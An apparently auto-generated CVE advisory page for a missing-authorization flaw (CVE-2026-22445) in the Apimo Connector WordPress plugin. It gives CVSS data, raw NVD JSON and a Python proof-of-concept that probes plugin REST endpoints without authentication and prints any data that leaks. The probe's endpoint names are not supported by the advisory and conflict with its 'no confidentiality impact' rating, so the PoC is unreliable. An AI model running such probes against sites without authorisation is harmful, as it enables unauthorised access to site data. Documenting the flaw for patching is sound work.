Security Vulnerability Report
中文
CVE-2026-22445 CVSS 5.3 MEDIUM

CVE-2026-22445

Published: 2026-01-22 17:16:34
Last Modified: 2026-04-28 19:36:38

Description

Missing Authorization vulnerability in Proptech Plugin Apimo Connector apimo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Apimo Connector: from n/a through <= 2.6.5.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Apimo Connector < 2.6.5.2
Apimo Connector 2.6.5.2
Apimo Connector n/a through 2.6.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22445 PoC - Missing Authorization in Apimo Connector # WordPress Plugin: apimo (versions <= 2.6.5.2) # This PoC demonstrates unauthorized access to protected endpoints import requests import sys TARGET_URL = "http://target-wordpress-site.com" PLUGIN_ENDPOINT = "/wp-json/apimo/v1/" def check_vulnerability(): """ Test for Missing Authorization vulnerability No authentication required to access protected data """ # Test unauthenticated access to property data endpoint endpoints_to_test = [ "properties", "agents", "contacts", "settings", "export" ] print(f"[*] Testing CVE-2026-22445 - Missing Authorization in Apimo Connector") print(f"[*] Target: {TARGET_URL}") print("-" * 60) vulnerable = False for endpoint in endpoints_to_test: url = f"{TARGET_URL}{PLUGIN_ENDPOINT}{endpoint}" try: # No authentication headers - testing unauthorized access response = requests.get(url, timeout=10) if response.status_code == 200: print(f"[!] VULNERABLE: {endpoint} - Accessible without auth") print(f" Status: {response.status_code}") print(f" Data preview: {response.text[:200]}...") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[+] SECURE: {endpoint} - Properly protected") else: print(f"[*] UNKNOWN: {endpoint} - Status {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] ERROR testing {endpoint}: {e}") print("-" * 60) if vulnerable: print("[!] Target is VULNERABLE to CVE-2026-22445") print("[!] Missing Authorization allows unauthorized data access") else: print("[+] Target appears to be PATCHED or endpoint not found") return vulnerable if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22445", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:34.393", "lastModified": "2026-04-28T19:36:37.837", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Proptech Plugin Apimo Connector apimo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Apimo Connector: from n/a through <= 2.6.5.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Proptech Plugin Apimo Connector apimo permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Apimo Connector: desde n/a hasta &lt;= 2.6.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/apimo/vulnerability/wordpress-apimo-connector-plugin-2-6-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}